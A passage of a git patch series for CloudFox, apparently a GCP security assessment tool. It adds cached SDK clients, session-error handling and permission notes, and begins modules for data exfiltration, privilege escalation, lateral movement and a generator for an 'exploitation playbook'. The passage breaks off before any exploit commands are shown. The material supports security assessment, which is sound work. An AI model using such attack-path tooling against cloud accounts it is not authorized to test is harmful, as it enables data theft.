"compute") + if cached, found := GCPSDKCache.Get(cacheKey); found { + return cached.(*compute.Service), nil + } + service, err := GetComputeService(ctx, session) + if err != nil { + return nil, err + } + GCPSDKCache.Set(cacheKey, service, 0) + return service, nil +} + +// CachedGetIAMService returns a cached IAM service +func CachedGetIAMService(ctx context.Context, session *gcpinternal.SafeSession) (*iam.Service, error) { + cacheKey := CacheKey("client", "iam") + if cached, found := GCPSDKCache.Get(cacheKey); found { + return cached.(*iam.Service), nil + } + service, err := GetIAMService(ctx, session) + if err != nil { + return nil, err + } + GCPSDKCache.Set(cacheKey, service, 0) + return service, nil +} + +// CachedGetResourceManagerService returns a cached Resource Manager service +func CachedGetResourceManagerService(ctx context.Context, session *gcpinternal.SafeSession) (*cloudresourcemanager.Service, error) { + cacheKey := CacheKey("client", "resourcemanager") + if cached, found := GCPSDKCache.Get(cacheKey); found { + return cached.(*cloudresourcemanager.Service), nil + } + service, err := GetResourceManagerService(ctx, session) + if err != nil { + return nil, err + } + GCPSDKCache.Set(cacheKey, service, 0) + return service, nil +} + +// CachedGetSecretManagerService returns a cached Secret Manager service +func CachedGetSecretManagerService(ctx context.Context, session *gcpinternal.SafeSession) (*secretmanagerapi.Service, error) { + cacheKey := CacheKey("client", "secretmanager") + if cached, found := GCPSDKCache.Get(cacheKey); found { + return cached.(*secretmanagerapi.Service), nil + } + service, err := GetSecretManagerService(ctx, session) + if err != nil { + return nil, err + } + GCPSDKCache.Set(cacheKey, service, 0) + return service, nil +} + +// CachedGetBigQueryService returns a cached BigQuery service +func CachedGetBigQueryService(ctx context.Context, session *gcpinternal.SafeSession) (*bigqueryapi.Service, error) { + cacheKey := CacheKey("client", "bigquery") + if cached, found := GCPSDKCache.Get(cacheKey); found { + return cached.(*bigqueryapi.Service), nil + } + service, err := GetBigQueryService(ctx, session) + if err != nil { + return nil, err + } + GCPSDKCache.Set(cacheKey, service, 0) + return service, nil +} + +// CachedGetStorageService returns a cached Storage service (REST API) +func CachedGetStorageService(ctx context.Context, session *gcpinternal.SafeSession) (*storageapi.Service, error) { + cacheKey := CacheKey("client", "storage-api") + if cached, found := GCPSDKCache.Get(cacheKey); found { + return cached.(*storageapi.Service), nil + } + service, err := GetStorageService(ctx, session) + if err != nil { + return nil, err + } + GCPSDKCache.Set(cacheKey, service, 0) + return service, nil +} + +// CachedGetContainerService returns a cached GKE Container service +func CachedGetContainerService(ctx context.Context, session *gcpinternal.SafeSession) (*container.Service, error) { + cacheKey := CacheKey("client", "container") + if cached, found := GCPSDKCache.Get(cacheKey); found { + return cached.(*container.Service), nil + } + service, err := GetContainerService(ctx, session) + if err != nil { + return nil, err + } + GCPSDKCache.Set(cacheKey, service, 0) + return service, nil +} + +// CachedGetCloudRunService returns a cached Cloud Run service +func CachedGetCloudRunService(ctx context.Context, session *gcpinternal.SafeSession) (*run.APIService, error) { + cacheKey := CacheKey("client", "cloudrun") + if cached, found := GCPSDKCache.Get(cacheKey); found { + return cached.(*run.APIService), nil + } + service, err := GetCloudRunService(ctx, session) + if err != nil { + return nil, err + } + GCPSDKCache.Set(cacheKey, service, 0) + return service, nil +} + +// CachedGetCloudFunctionsService returns a cached Cloud Functions service (v1) +func CachedGetCloudFunctionsService(ctx context.Context, session *gcpinternal.SafeSession) (*cloudfunctions.Service, error) { + cacheKey := CacheKey("client", "cloudfunctions") + if cached, found := GCPSDKCache.Get(cacheKey); found { + return cached.(*cloudfunctions.Service), nil + } + service, err := GetCloudFunctionsService(ctx, session) + if err != nil { + return nil, err + } + GCPSDKCache.Set(cacheKey, service, 0) + return service, nil +} + +// CachedGetCloudFunctionsServiceV2 returns a cached Cloud Functions v2 service +func CachedGetCloudFunctionsServiceV2(ctx context.Context, session *gcpinternal.SafeSession) (*cloudfunctionsv2.Service, error) { + cacheKey := CacheKey("client", "cloudfunctionsv2") + if cached, found := GCPSDKCache.Get(cacheKey); found { + return cached.(*cloudfunctionsv2.Service), nil + } + service, err := GetCloudFunctionsServiceV2(ctx, session) + if err != nil { + return nil, err + } + GCPSDKCache.Set(cacheKey, service, 0) + return service, nil +} + +// CachedGetDNSService returns a cached DNS service +func CachedGetDNSService(ctx context.Context, session *gcpinternal.SafeSession) (*dns.Service, error) { + cacheKey := CacheKey("client", "dns") + if cached, found := GCPSDKCache.Get(cacheKey); found { + return cached.(*dns.Service), nil + } + service, err := GetDNSService(ctx, session) + if err != nil { + return nil, err + } + GCPSDKCache.Set(cacheKey, service, 0) + return service, nil +} + +// CachedGetLoggingService returns a cached Logging service +func CachedGetLoggingService(ctx context.Context, session *gcpinternal.SafeSession) (*logging.Service, error) { + cacheKey := CacheKey("client", "logging") + if cached, found := GCPSDKCache.Get(cacheKey); found { + return cached.(*logging.Service), nil + } + service, err := GetLoggingService(ctx, session) + if err != nil { + return nil, err + } + GCPSDKCache.Set(cacheKey, service, 0) + return service, nil +} + +// CachedGetKMSService returns a cached KMS service +func CachedGetKMSService(ctx context.Context, session *gcpinternal.SafeSession) (*cloudkms.Service, error) { + cacheKey := CacheKey("client", "kms") + if cached, found := GCPSDKCache.Get(cacheKey); found { + return cached.(*cloudkms.Service), nil + } + service, err := GetKMSService(ctx, session) + if err != nil { + return nil, err + } + GCPSDKCache.Set(cacheKey, service, 0) + return service, nil +} + +// CachedGetSQLAdminService returns a cached SQL Admin service (v1) +func CachedGetSQLAdminService(ctx context.Context, session *gcpinternal.SafeSession) (*sqladmin.Service, error) { + cacheKey := CacheKey("client", "sqladmin") + if cached, found := GCPSDKCache.Get(cacheKey); found { + return cached.(*sqladmin.Service), nil + } + service, err := GetSQLAdminService(ctx, session) + if err != nil { + return nil, err + } + GCPSDKCache.Set(cacheKey, service, 0) + return service, nil +} + +// CachedGetSQLAdminServiceBeta returns a cached SQL Admin service (v1beta4) +func CachedGetSQLAdminServiceBeta(ctx context.Context, session *gcpinternal.SafeSession) (*sqladminbeta.Service, error) { + cacheKey := CacheKey("client", "sqladminbeta") + if cached, found := GCPSDKCache.Get(cacheKey); found { + return cached.(*sqladminbeta.Service), nil + } + service, err := GetSQLAdminServiceBeta(ctx, session) + if err != nil { + return nil, err + } + GCPSDKCache.Set(cacheKey, service, 0) + return service, nil +} + +// CachedGetPubSubService returns a cached PubSub service +func CachedGetPubSubService(ctx context.Context, session *gcpinternal.SafeSession) (*pubsubapi.Service, error) { + cacheKey := CacheKey("client", "pubsub") + if cached, found := GCPSDKCache.Get(cacheKey); found { + return cached.(*pubsubapi.Service), nil + } + service, err := GetPubSubService(ctx, session) + if err != nil { + return nil, err + } + GCPSDKCache.Set(cacheKey, service, 0) + return service, nil +} + +// CachedGetCloudIdentityService returns a cached Cloud Identity service +func CachedGetCloudIdentityService(ctx context.Context, session *gcpinternal.SafeSession) (*cloudidentity.Service, error) { + cacheKey := CacheKey("client", "cloudidentity") + if cached, found := GCPSDKCache.Get(cacheKey); found { + return cached.(*cloudidentity.Service), nil + } + service, err := GetCloudIdentityService(ctx, session) + if err != nil { + return nil, err + } + GCPSDKCache.Set(cacheKey, service, 0) + return service, nil +} + +// CachedGetAccessContextManagerService returns a cached Access Context Manager service +func CachedGetAccessContextManagerService(ctx context.Context, session *gcpinternal.SafeSession) (*accesscontextmanager.Service, error) { + cacheKey := CacheKey("client", "accesscontextmanager") + if cached, found := GCPSDKCache.Get(cacheKey); found { + return cached.(*accesscontextmanager.Service), nil + } + service, err := GetAccessContextManagerService(ctx, session) + if err != nil { + return nil, err + } + GCPSDKCache.Set(cacheKey, service, 0) + return service, nil +} + +// CachedGetRedisService returns a cached Redis service +func CachedGetRedisService(ctx context.Context, session *gcpinternal.SafeSession) (*redis.Service, error) { + cacheKey := CacheKey("client", "redis") + if cached, found := GCPSDKCache.Get(cacheKey); found { + return cached.(*redis.Service), nil + } + service, err := GetRedisService(ctx, session) + if err != nil { + return nil, err + } + GCPSDKCache.Set(cacheKey, service, 0) + return service, nil +} + +// CachedGetSpannerService returns a cached Spanner service +func CachedGetSpannerService(ctx context.Context, session *gcpinternal.SafeSession) (*spanner.Service, error) { + cacheKey := CacheKey("client", "spanner") + if cached, found := GCPSDKCache.Get(cacheKey); found { + return cached.(*spanner.Service), nil + } + service, err := GetSpannerService(ctx, session) + if err != nil { + return nil, err + } + GCPSDKCache.Set(cacheKey, service, 0) + return service, nil +} + +// CachedGetBigtableAdminService returns a cached Bigtable Admin service +func CachedGetBigtableAdminService(ctx context.Context, session *gcpinternal.SafeSession) (*bigtableadmin.Service, error) { + cacheKey := CacheKey("client", "bigtableadmin") + if cached, found := GCPSDKCache.Get(cacheKey); found { + return cached.(*bigtableadmin.Service), nil + } + service, err := GetBigtableAdminService(ctx, session) + if err != nil { + return nil, err + } + GCPSDKCache.Set(cacheKey, service, 0) + return service, nil +} + +// CachedGetFilestoreService returns a cached Filestore service +func CachedGetFilestoreService(ctx context.Context, session *gcpinternal.SafeSession) (*file.Service, error) { + cacheKey := CacheKey("client", "filestore") + if cached, found := GCPSDKCache.Get(cacheKey); found { + return cached.(*file.Service), nil + } + service, err := GetFilestoreService(ctx, session) + if err != nil { + return nil, err + } + GCPSDKCache.Set(cacheKey, service, 0) + return service, nil +} + +// CachedGetCloudBuildService returns a cached Cloud Build service +func CachedGetCloudBuildService(ctx context.Context, session *gcpinternal.SafeSession) (*cloudbuild.Service, error) { + cacheKey := CacheKey("client", "cloudbuild") + if cached, found := GCPSDKCache.Get(cacheKey); found { + return cached.(*cloudbuild.Service), nil + } + service, err := GetCloudBuildService(ctx, session) + if err != nil { + return nil, err + } + GCPSDKCache.Set(cacheKey, service, 0) + return service, nil +} + +// CachedGetComposerService returns a cached Composer service +func CachedGetComposerService(ctx context.Context, session *gcpinternal.SafeSession) (*composer.Service, error) { + cacheKey := CacheKey("client", "composer") + if cached, found := GCPSDKCache.Get(cacheKey); found { + return cached.(*composer.Service), nil + } + service, err := GetComposerService(ctx, session) + if err != nil { + return nil, err + } + GCPSDKCache.Set(cacheKey, service, 0) + return service, nil +} + +// CachedGetDataflowService returns a cached Dataflow service +func CachedGetDataflowService(ctx context.Context, session *gcpinternal.SafeSession) (*dataflow.Service, error) { + cacheKey := CacheKey("client", "dataflow") + if cached, found := GCPSDKCache.Get(cacheKey); found { + return cached.(*dataflow.Service), nil + } + service, err := GetDataflowService(ctx, session) + if err != nil { + return nil, err + } + GCPSDKCache.Set(cacheKey, service, 0) + return service, nil +} + +// CachedGetDataprocService returns a cached Dataproc service +func CachedGetDataprocService(ctx context.Context, session *gcpinternal.SafeSession) (*dataproc.Service, error) { + cacheKey := CacheKey("client", "dataproc") + if cached, found := GCPSDKCache.Get(cacheKey); found { + return cached.(*dataproc.Service), nil + } + service, err := GetDataprocService(ctx, session) + if err != nil { + return nil, err + } + GCPSDKCache.Set(cacheKey, service, 0) + return service, nil +} + +// CachedGetNotebooksService returns a cached Notebooks service +func CachedGetNotebooksService(ctx context.Context, session *gcpinternal.SafeSession) (*notebooks.Service, error) { + cacheKey := CacheKey("client", "notebooks") + if cached, found := GCPSDKCache.Get(cacheKey); found { + return cached.(*notebooks.Service), nil + } + service, err := GetNotebooksService(ctx, session) + if err != nil { + return nil, err + } + GCPSDKCache.Set(cacheKey, service, 0) + return service, nil +} + +// CachedGetSchedulerService returns a cached Scheduler service +func CachedGetSchedulerService(ctx context.Context, session *gcpinternal.SafeSession) (*cloudscheduler.Service, error) { + cacheKey := CacheKey("client", "scheduler") + if cached, found := GCPSDKCache.Get(cacheKey); found { + return cached.(*cloudscheduler.Service), nil + } + service, err := GetSchedulerService(ctx, session) + if err != nil { + return nil, err + } + GCPSDKCache.Set(cacheKey, service, 0) + return service, nil +} + +// CachedGetAPIKeysService returns a cached API Keys service +func CachedGetAPIKeysService(ctx context.Context, session *gcpinternal.SafeSession) (*apikeys.Service, error) { + cacheKey := CacheKey("client", "apikeys") + if cached, found := GCPSDKCache.Get(cacheKey); found { + return cached.(*apikeys.Service), nil + } + service, err := GetAPIKeysService(ctx, session) + if err != nil { + return nil, err + } + GCPSDKCache.Set(cacheKey, service, 0) + return service, nil +} + +// CachedGetOrgPolicyService returns a cached Org Policy service +func CachedGetOrgPolicyService(ctx context.Context, session *gcpinternal.SafeSession) (*orgpolicy.Service, error) { + cacheKey := CacheKey("client", "orgpolicy") + if cached, found := GCPSDKCache.Get(cacheKey); found { + return cached.(*orgpolicy.Service), nil + } + service, err := GetOrgPolicyService(ctx, session) + if err != nil { + return nil, err + } + GCPSDKCache.Set(cacheKey, service, 0) + return service, nil +} + +// CachedGetSourceRepoService returns a cached Source Repo service +func CachedGetSourceRepoService(ctx context.Context, session *gcpinternal.SafeSession) (*sourcerepo.Service, error) { + cacheKey := CacheKey("client", "sourcerepo") + if cached, found := GCPSDKCache.Get(cacheKey); found { + return cached.(*sourcerepo.Service), nil + } + service, err := GetSourceRepoService(ctx, session) + if err != nil { + return nil, err + } + GCPSDKCache.Set(cacheKey, service, 0) + return service, nil +} + +// CachedGetBeyondCorpService returns a cached BeyondCorp service +func CachedGetBeyondCorpService(ctx context.Context, session *gcpinternal.SafeSession) (*beyondcorp.Service, error) { + cacheKey := CacheKey("client", "beyondcorp") + if cached, found := GCPSDKCache.Get(cacheKey); found { + return cached.(*beyondcorp.Service), nil + } + service, err := GetBeyondCorpService(ctx, session) + if err != nil { + return nil, err + } + GCPSDKCache.Set(cacheKey, service, 0) + return service, nil +} + +// CachedGetIAPService returns a cached IAP service +func CachedGetIAPService(ctx context.Context, session *gcpinternal.SafeSession) (*iap.Service, error) { + cacheKey := CacheKey("client", "iap") + if cached, found := GCPSDKCache.Get(cacheKey); found { + return cached.(*iap.Service), nil + } + service, err := GetIAPService(ctx, session) + if err != nil { + return nil, err + } + GCPSDKCache.Set(cacheKey, service, 0) + return service, nil +} + +// CachedGetCertificateManagerService returns a cached Certificate Manager service +func CachedGetCertificateManagerService(ctx context.Context, session *gcpinternal.SafeSession) (*certificatemanager.Service, error) { + cacheKey := CacheKey("client", "certificatemanager") + if cached, found := GCPSDKCache.Get(cacheKey); found { + return cached.(*certificatemanager.Service), nil + } + service, err := GetCertificateManagerService(ctx, session) + if err != nil { + return nil, err + } + GCPSDKCache.Set(cacheKey, service, 0) + return service, nil +} + +// CachedGetServiceNetworkingService returns a cached Service Networking service +func CachedGetServiceNetworkingService(ctx context.Context, session *gcpinternal.SafeSession) (*servicenetworking.APIService, error) { + cacheKey := CacheKey("client", "servicenetworking") + if cached, found := GCPSDKCache.Get(cacheKey); found { + return cached.(*servicenetworking.APIService), nil + } + service, err := GetServiceNetworkingService(ctx, session) + if err != nil { + return nil, err + } + GCPSDKCache.Set(cacheKey, service, 0) + return service, nil +} + +// CachedGetArtifactRegistryService returns a cached Artifact Registry service +func CachedGetArtifactRegistryService(ctx context.Context, session *gcpinternal.SafeSession) (*artifactregistryapi.Service, error) { + cacheKey := CacheKey("client", "artifactregistry") + if cached, found := GCPSDKCache.Get(cacheKey); found { + return cached.(*artifactregistryapi.Service), nil + } + service, err := GetArtifactRegistryService(ctx, session) + if err != nil { + return nil, err + } + GCPSDKCache.Set(cacheKey, service, 0) + return service, nil +} + +// CachedGetCloudRunServiceV2 returns a cached Cloud Run v2 service +func CachedGetCloudRunServiceV2(ctx context.Context, session *gcpinternal.SafeSession) (*runv2.Service, error) { + cacheKey := CacheKey("client", "cloudrunv2") + if cached, found := GCPSDKCache.Get(cacheKey); found { + return cached.(*runv2.Service), nil + } + service, err := GetCloudRunServiceV2(ctx, session) + if err != nil { + return nil, err + } + GCPSDKCache.Set(cacheKey, service, 0) + return service, nil +} + +// CachedGetSecretManagerClient returns a cached Secret Manager client (Go SDK) +func CachedGetSecretManagerClient(ctx context.Context, session *gcpinternal.SafeSession) (*secretmanagerclient.Client, error) { + cacheKey := CacheKey("client", "secretmanager-gosdk") + if cached, found := GCPSDKCache.Get(cacheKey); found { + return cached.(*secretmanagerclient.Client), nil + } + client, err := GetSecretManagerClient(ctx, session) + if err != nil { + return nil, err + } + GCPSDKCache.Set(cacheKey, client, 0) + return client, nil +} + +// CachedGetAssetClient returns a cached Asset client +func CachedGetAssetClient(ctx context.Context, session *gcpinternal.SafeSession) (*asset.Client, error) { + cacheKey := CacheKey("client", "asset") + if cached, found := GCPSDKCache.Get(cacheKey); found { + return cached.(*asset.Client), nil + } + client, err := GetAssetClient(ctx, session) + if err != nil { + return nil, err + } + GCPSDKCache.Set(cacheKey, client, 0) + return client, nil +} + +// CachedGetArtifactRegistryClient returns a cached Artifact Registry client (Go SDK) +func CachedGetArtifactRegistryClient(ctx context.Context, session *gcpinternal.SafeSession) (*artifactregistry.Client, error) { + cacheKey := CacheKey("client", "artifactregistry-gosdk") + if cached, found := GCPSDKCache.Get(cacheKey); found { + return cached.(*artifactregistry.Client), nil + } + client, err := GetArtifactRegistryClient(ctx, session) + if err != nil { + return nil, err + } + GCPSDKCache.Set(cacheKey, client, 0) + return client, nil +} + +// CachedGetOrganizationsClient returns a cached Organizations client +func CachedGetOrganizationsClient(ctx context.Context, session *gcpinternal.SafeSession) (*resourcemanager.OrganizationsClient, error) { + cacheKey := CacheKey("client", "organizations") + if cached, found := GCPSDKCache.Get(cacheKey); found { + return cached.(*resourcemanager.OrganizationsClient), nil + } + client, err := GetOrganizationsClient(ctx, session) + if err != nil { + return nil, err + } + GCPSDKCache.Set(cacheKey, client, 0) + return client, nil +} diff --git a/gcp/sdk/interfaces.go b/internal/gcp/sdk/interfaces.go similarity index 100% rename from gcp/sdk/interfaces.go rename to internal/gcp/sdk/interfaces.go index 9206bc87..024957fa 100644 --- a/gcp/sdk/interfaces.go +++ b/internal/gcp/sdk/interfaces.go @@ -5,11 +5,11 @@ import ( "cloud.google.com/go/iam" "cloud.google.com/go/storage" - compute "google.golang.org/api/compute/v1" cloudresourcemanager "google.golang.org/api/cloudresourcemanager/v1" cloudresourcemanagerv2 "google.golang.org/api/cloudresourcemanager/v2" - secretmanager "google.golang.org/api/secretmanager/v1" + compute "google.golang.org/api/compute/v1" iam_admin "google.golang.org/api/iam/v1" + secretmanager "google.golang.org/api/secretmanager/v1" ) // StorageClientInterface defines the interface for Cloud Storage operations From 04bb167273f0858b0a7e8d6d4a763c95a73fd99c Mon Sep 17 00:00:00 2001 From: jbarciabf Date: Tue, 20 Jan 2026 08:20:09 -0500 Subject: [PATCH 27/48] updated version number --- globals/utils.go | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/globals/utils.go b/globals/utils.go index cec516ae..ad1dabb0 100644 --- a/globals/utils.go +++ b/globals/utils.go @@ -4,4 +4,4 @@ const CLOUDFOX_USER_AGENT = "cloudfox" const CLOUDFOX_LOG_FILE_DIR_NAME = ".cloudfox" const CLOUDFOX_BASE_DIRECTORY = "cloudfox-output" const LOOT_DIRECTORY_NAME = "loot" -const CLOUDFOX_VERSION = "1.17.0" +const CLOUDFOX_VERSION = "2.0.0" From 711e29e3bb92da2fb7928c0fce2d24707a3c383c Mon Sep 17 00:00:00 2001 From: jbarciabf Date: Tue, 20 Jan 2026 08:33:20 -0500 Subject: [PATCH 28/48] updated readme permissions --- README.md | 10 ++++------ 1 file changed, 4 insertions(+), 6 deletions(-) diff --git a/README.md b/README.md index f9feb73d..7836c103 100644 --- a/README.md +++ b/README.md @@ -117,7 +117,7 @@ Additional policy notes (as of 09/2022): **Minimal Permissions (Single Project):** -For basic enumeration of a single project, the `roles/viewer` role provides read access to most resources. +For basic enumeration of a single project, the `roles/viewer` role provides read access to most resources (includes logging, monitoring, and compute/network viewing). **Comprehensive Permissions (Organization-Wide):** @@ -130,13 +130,11 @@ For thorough security assessments across an entire organization: | **Organization** | `roles/cloudasset.viewer` | Query Cloud Asset Inventory for all resources | | **Organization** | `roles/cloudidentity.groupsViewer` | Enumerate Google Groups and memberships | | **Folder** | `roles/resourcemanager.folderViewer` | View folder hierarchy and metadata | -| **Project** | `roles/viewer` | Read access to most project resources | -| **Project** | `roles/monitoring.viewer` | View monitoring metrics and dashboards | -| **Project** | `roles/logging.viewer` | Read audit logs and log-based metrics | -| **Project** | `roles/compute.networkViewer` | View network configurations, firewall rules, VPCs | -| **Project** | `roles/serviceusage.viewer` | View enabled APIs and service configurations | +| **Project** | `roles/viewer` | Read access to most project resources (includes logging.viewer, monitoring.viewer, compute.viewer) | | **Tooling Project** | `roles/serviceusage.serviceUsageAdmin` | (Optional) Manage API quotas for CloudFox operations | +> **Note:** The basic `roles/viewer` role includes permissions from `roles/logging.viewer`, `roles/monitoring.viewer`, and `roles/compute.networkViewer`, so these don't need to be granted separately. + #### GCP API Requirements **APIs must be enabled in each project you want to assess.** GCP APIs are project-scoped. From d24f817bf95b80d4b838dcf747a596ea3b225f4a Mon Sep 17 00:00:00 2001 From: jbarciabf Date: Tue, 20 Jan 2026 14:33:22 -0500 Subject: [PATCH 29/48] changed global all projects flag --- cli/gcp.go | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/cli/gcp.go b/cli/gcp.go index fe7f2f42..1ff409dd 100644 --- a/cli/gcp.go +++ b/cli/gcp.go @@ -385,7 +385,7 @@ func init() { // GCPCommands.PersistentFlags().StringVarP(&GCPOrganization, "organization", "o", "", "Organization name or number, repetable") GCPCommands.PersistentFlags().StringVarP(&GCPProjectID, "project", "p", "", "GCP project ID") GCPCommands.PersistentFlags().StringVarP(&GCPProjectIDsFilePath, "project-list", "l", "", "Path to a file containing a list of project IDs separated by newlines") - GCPCommands.PersistentFlags().BoolVarP(&GCPAllProjects, "all-projects", "a", false, "Automatically discover and use all accessible projects") + GCPCommands.PersistentFlags().BoolVarP(&GCPAllProjects, "all-projects", "A", true, "Automatically discover and target all accessible projects (default)") // GCPCommands.PersistentFlags().BoolVarP(&GCPConfirm, "yes", "y", false, "Non-interactive mode (like apt/yum)") // GCPCommands.PersistentFlags().StringVarP(&GCPOutputFormat, "output", "", "brief", "[\"brief\" | \"wide\" ]") GCPCommands.PersistentFlags().IntVarP(&Verbosity, "verbosity", "v", 2, "1 = Print control messages only\n2 = Print control messages, module output\n3 = Print control messages, module output, and loot file output\n") From 70107c607f460611646ee41762b1dcded814d618 Mon Sep 17 00:00:00 2001 From: jbarciabf Date: Fri, 23 Jan 2026 10:52:42 -0500 Subject: [PATCH 30/48] updated session handling --- internal/gcp/base.go | 119 +++++++++++++++++++++++++++++++++++++++++++ 1 file changed, 119 insertions(+) diff --git a/internal/gcp/base.go b/internal/gcp/base.go index def66138..3d374fa1 100644 --- a/internal/gcp/base.go +++ b/internal/gcp/base.go @@ -4,6 +4,7 @@ import ( "context" "errors" "fmt" + "os" "strings" "sync" @@ -23,8 +24,121 @@ var ( ErrPermissionDenied = errors.New("permission denied") ErrNotFound = errors.New("resource not found") ErrVPCServiceControls = errors.New("blocked by VPC Service Controls") + ErrSessionInvalid = errors.New("session invalid") ) +// ------------------------------ +// Session Error Detection +// ------------------------------ +// These functions detect when GCP credentials are invalid/expired +// and exit with clear messages to prevent incomplete data. + +// IsGCPSessionError checks if an error indicates a session/authentication problem. +// If true, the program should exit with a clear message - continuing would produce incomplete results. +func IsGCPSessionError(err error) bool { + if err == nil { + return false + } + + // Check for gRPC status errors + if grpcStatus, ok := status.FromError(err); ok { + switch grpcStatus.Code() { + case codes.Unauthenticated: + return true + } + } + + // Check for REST API errors (googleapi.Error) + var googleErr *googleapi.Error + if errors.As(err, &googleErr) { + // 401 Unauthorized is always a session error + if googleErr.Code == 401 { + return true + } + } + + // Check error message for common session issues + errStr := strings.ToLower(err.Error()) + + // Authentication failures + if strings.Contains(errStr, "unauthenticated") || + strings.Contains(errStr, "invalid_grant") || + strings.Contains(errStr, "token has been expired or revoked") || + strings.Contains(errStr, "token expired") || + strings.Contains(errStr, "refresh token") && strings.Contains(errStr, "expired") || + strings.Contains(errStr, "credentials") && strings.Contains(errStr, "expired") || + strings.Contains(errStr, "unable to authenticate") || + strings.Contains(errStr, "authentication failed") || + strings.Contains(errStr, "could not find default credentials") || + strings.Contains(errStr, "application default credentials") && strings.Contains(errStr, "not found") { + return true + } + + // Connection issues that indicate GCP is unreachable + if strings.Contains(errStr, "connection refused") || + strings.Contains(errStr, "no such host") || + strings.Contains(errStr, "connection reset") { + return true + } + + // OAuth issues + if strings.Contains(errStr, "oauth2") && (strings.Contains(errStr, "token") || strings.Contains(errStr, "expired")) { + return true + } + + return false +} + +// CheckGCPSessionError checks if an error is a session error and exits if so. +// Call this on every API error to ensure session issues are caught immediately. +// Returns true if error was a session error (program will have exited). +// Returns false if error is not a session error (caller should handle normally). +func CheckGCPSessionError(err error, logger internal.Logger, moduleName string) bool { + if !IsGCPSessionError(err) { + return false + } + + // Determine the specific session issue for a helpful message + errStr := strings.ToLower(err.Error()) + var reason string + + switch { + case strings.Contains(errStr, "invalid_grant") || strings.Contains(errStr, "token has been expired or revoked"): + reason = "Your GCP credentials have expired or been revoked" + case strings.Contains(errStr, "refresh token") && strings.Contains(errStr, "expired"): + reason = "Your refresh token has expired - please re-authenticate" + case strings.Contains(errStr, "could not find default credentials") || strings.Contains(errStr, "application default credentials"): + reason = "No GCP credentials found - run: gcloud auth application-default login" + case strings.Contains(errStr, "unauthenticated") || strings.Contains(errStr, "authentication failed"): + reason = "Authentication failed - your credentials are invalid" + case strings.Contains(errStr, "connection refused") || strings.Contains(errStr, "no such host"): + reason = "Cannot connect to GCP APIs - check your network connection" + default: + reason = "Session error detected - credentials may be invalid" + } + + logger.ErrorM("", moduleName) + logger.ErrorM("╔════════════════════════════════════════════════════════════════╗", moduleName) + logger.ErrorM("║ SESSION ERROR DETECTED ║", moduleName) + logger.ErrorM("╠════════════════════════════════════════════════════════════════╣", moduleName) + logger.ErrorM(fmt.Sprintf("║ %s", reason), moduleName) + logger.ErrorM("║ ║", moduleName) + logger.ErrorM("║ Your GCP session is no longer valid. ║", moduleName) + logger.ErrorM("║ Results may be incomplete - please fix and re-run. ║", moduleName) + logger.ErrorM("╠════════════════════════════════════════════════════════════════╣", moduleName) + logger.ErrorM("║ Common fixes: ║", moduleName) + logger.ErrorM("║ • Re-authenticate: gcloud auth login ║", moduleName) + logger.ErrorM("║ • ADC login: gcloud auth application-default login ║", moduleName) + logger.ErrorM("║ • Check account: gcloud auth list ║", moduleName) + logger.ErrorM("║ • Service account: check GOOGLE_APPLICATION_CREDENTIALS ║", moduleName) + logger.ErrorM("╚════════════════════════════════════════════════════════════════╝", moduleName) + logger.ErrorM("", moduleName) + logger.ErrorM(fmt.Sprintf("Original error: %v", err), moduleName) + + os.Exit(1) + return true // Never reached, but satisfies compiler +} + // ParseGCPError converts GCP API errors into cleaner, standardized error types // This should be used by all GCP service modules for consistent error handling // Handles both REST API errors (googleapi.Error) and gRPC errors (status.Error) @@ -140,11 +254,16 @@ func IsAPINotEnabled(err error) bool { // HandleGCPError logs an appropriate message for a GCP API error and returns true if execution should continue // Returns false if the error is fatal and the caller should stop processing +// IMPORTANT: This now checks for session errors first and will exit if credentials are invalid! func HandleGCPError(err error, logger internal.Logger, moduleName string, resourceDesc string) bool { if err == nil { return true // No error, continue } + // CRITICAL: Check for session errors first - exit immediately if credentials are invalid + // This prevents incomplete data from being saved + CheckGCPSessionError(err, logger, moduleName) + // Parse the raw GCP error into a standardized error type parsedErr := ParseGCPError(err, "") From 44bf8e891531bdbb520d9819353e5828107a7ee9 Mon Sep 17 00:00:00 2001 From: jbarciabf Date: Thu, 29 Jan 2026 16:16:17 -0500 Subject: [PATCH 31/48] added attackpaths and loot --- gcp/commands/dataexfiltration.go | 281 ++++++++++ gcp/commands/hiddenadmins.go | 870 +++++++++++++++++++++++++++++++ gcp/commands/lateralmovement.go | 279 ++++++++++ gcp/commands/privesc.go | 300 +++++++++++ globals/gcp.go | 1 + 5 files changed, 1731 insertions(+) create mode 100644 gcp/commands/hiddenadmins.go diff --git a/gcp/commands/dataexfiltration.go b/gcp/commands/dataexfiltration.go index 1ea23d26..b7bf869c 100644 --- a/gcp/commands/dataexfiltration.go +++ b/gcp/commands/dataexfiltration.go @@ -675,6 +675,271 @@ func (m *DataExfiltrationModule) initializeLootForProject(projectID string) { } } +func (m *DataExfiltrationModule) generatePlaybook() *internal.LootFile { + return &internal.LootFile{ + Name: "data-exfiltration-playbook", + Contents: `# GCP Data Exfiltration Playbook +# Generated by CloudFox +# +# This playbook provides exploitation techniques for identified data exfiltration paths. + +` + m.generatePlaybookSections(), + } +} + +func (m *DataExfiltrationModule) generatePlaybookSections() string { + var sections strings.Builder + + allPaths := m.getAllExfiltrationPaths() + allVectors := m.getAllPotentialVectors() + allExports := m.getAllPublicExports() + allPermPaths := m.getAllPermissionBasedExfil() + + // Group by path type + publicSnapshots := []ExfiltrationPath{} + publicImages := []ExfiltrationPath{} + publicBuckets := []ExfiltrationPath{} + loggingSinks := []ExfiltrationPath{} + pubsubPaths := []ExfiltrationPath{} + bqPaths := []ExfiltrationPath{} + sqlPaths := []ExfiltrationPath{} + transferPaths := []ExfiltrationPath{} + + for _, p := range allPaths { + switch { + case strings.Contains(p.PathType, "Snapshot"): + publicSnapshots = append(publicSnapshots, p) + case strings.Contains(p.PathType, "Image"): + publicImages = append(publicImages, p) + case strings.Contains(p.PathType, "Bucket") || strings.Contains(p.PathType, "Storage"): + publicBuckets = append(publicBuckets, p) + case strings.Contains(p.PathType, "Logging"): + loggingSinks = append(loggingSinks, p) + case strings.Contains(p.PathType, "Pub/Sub") || strings.Contains(p.PathType, "PubSub"): + pubsubPaths = append(pubsubPaths, p) + case strings.Contains(p.PathType, "BigQuery"): + bqPaths = append(bqPaths, p) + case strings.Contains(p.PathType, "SQL"): + sqlPaths = append(sqlPaths, p) + case strings.Contains(p.PathType, "Transfer"): + transferPaths = append(transferPaths, p) + } + } + + // Public Snapshots + if len(publicSnapshots) > 0 { + sections.WriteString("## Public 